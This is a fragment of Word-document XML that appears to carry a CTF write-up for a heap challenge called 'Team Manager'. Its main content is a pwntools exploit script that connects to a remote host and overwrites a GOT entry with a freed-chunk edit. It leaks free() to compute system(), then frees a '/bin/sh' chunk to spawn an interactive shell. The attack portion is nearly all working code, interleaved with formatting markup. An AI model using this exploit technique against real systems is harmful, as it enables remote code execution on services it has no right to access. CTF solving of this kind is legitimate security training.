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160" w:before="160" w:line="264" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="3c763d"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7m8id76qc31v" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:hyperlink r:id="rId6">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="23527c"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Team Manager</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="3c763d"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (300pts)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#!/usr/bin/env python2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-*- coding: utf-8 -*-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pwn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</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">exe = context.binary = ELF(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'timctf_manager'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host = args.HOST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'89.38.208.144'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port = int(args.PORT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11114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(argv=[], *a, **kw):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'''Execute the target binary locally'''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args.GDB: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gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)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process([exe.path] + argv, *a, **kw)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remote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(argv=[], *a, **kw):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'''Connect to the process on the remote host'''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io = connect(host, port)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args.GDB:</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        gdb.attach(io, gdbscript=gdbscript)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(argv=[], *a, **kw):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'''Start the exploit against the target.'''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args.LOCAL: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local(argv, *a, **kw)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remote(argv, *a, **kw)</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">gdbscript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</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">break *0x{exe.symbols.main:x}</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">continue</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">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.format(**locals())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-- Exploit goes here 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context.terminal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'tilix'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'-e'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get_menu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io.recvuntil(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'Exit\n'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add_player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(i, name, first, second, third, fourth, comment):</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    get_menu()</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    io.sendline(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')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str(i))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str(name))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str(first))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str(third))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str(second))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str(fourth))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str(comment))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remove_player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(i):</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    get_menu()</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    io.sendline(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')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str(i))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edit_player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(i, name, first, second, third, fourth, comment):</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    get_menu()</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    io.sendline(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')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str(i))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str(name))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str(first))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str(third))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str(second))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str(fourth))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str(comment))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view_player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(i):</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    get_menu()</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    io.sendline(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io.sendlineafter(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')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str(i))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print(io.recvline())</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    io.recvuntil(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io.recvline()</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">io = start()</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">add_player(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'AAAA'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add_player(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'BBBB'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remove_player(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edit_player(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'AAAA'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288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p64(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0x602018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free_mem = u64(view_player(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)[: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br w:type="textWrapping"/>
              <w:t xml:space="preserve">log.success(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'Free in memory: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hex(free_mem))</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">system = free_mem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0x48510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system = free_mem - 0x40420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edit_player(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'BBBB'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p64(system))</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">edit_player(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'AAAA'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'/bin/sh\x00'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remove_player(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io.interactive()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misoaractf.ro/challenge?id=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